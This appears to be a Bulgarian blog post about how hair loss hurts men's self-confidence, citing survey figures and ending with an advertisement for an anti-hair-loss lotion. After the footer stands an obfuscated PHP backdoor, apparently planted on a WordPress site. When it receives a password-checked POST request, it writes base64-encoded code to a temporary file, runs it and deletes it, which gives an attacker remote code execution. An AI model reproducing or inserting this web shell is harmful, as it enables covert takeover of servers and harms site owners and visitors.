Мъже, не позволявайте оплешивяването да съсипе самочувствието ви! | Косопад

Мъже, не позволявайте оплешивяването да съсипе самочувствието ви!

opleshivqvane-recepti

Мъжете губят самоувереността си заедно с косата. До това заключение стигат група учени. Оплешивяването влияе директно върху самочувствието на мъжа. Освен това, представлява сериозна пречка при флирта. Но не е задължително да се губи увереността.

Кой мъж не се безпокои, когато види, че косата му се разрежда? Но този естетически проблем има много по- голямо въздействие върху силния пол, отколкото си мислим.

Международно изследване провери как се чувстват мъжете, когато губят косата си. И истината е, че много трудно го преживяват. Повече от 62% признават, че косопадът засяга самочувствието им.

opleshivqvane-bilka

Освен това, не се чувстват толкова сигурни в себе си в сравнение с мъжете, които нямат този проблем.

Оплешивяването се отразява и на емоционалния им живот. В европейските мащаби жертви на косопада са всеки 7 от 10 мъже. Според тях, косата е много важна, когато съблазняват жените.

71% от анкетираните смятат, че разреждането на косата ще се отрази негативно на отношението на жените към тях. 1 от 3 мъже мислят, че мъжете с хубава и буйна коса са по- привлекателни за нежния пол. Но изследването не е потърсило, за съжаление, мнението на жените.

Мъжете с този проблем търсят всякакви начини за разрешаването му. Някои си бръснат главите, други носят шапки.

Важно е, когато видите, че косата ви намалява, веднага да вземете мерки. Важно е да се установи каква е причината за косопада, но това е доста трудна задача. Доверете се на лосиона срещу косопад и оплешивяване ЕФЕКТ- 2 с доказани качества вече 11 години!

25. октомври 2015 12:58:26 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}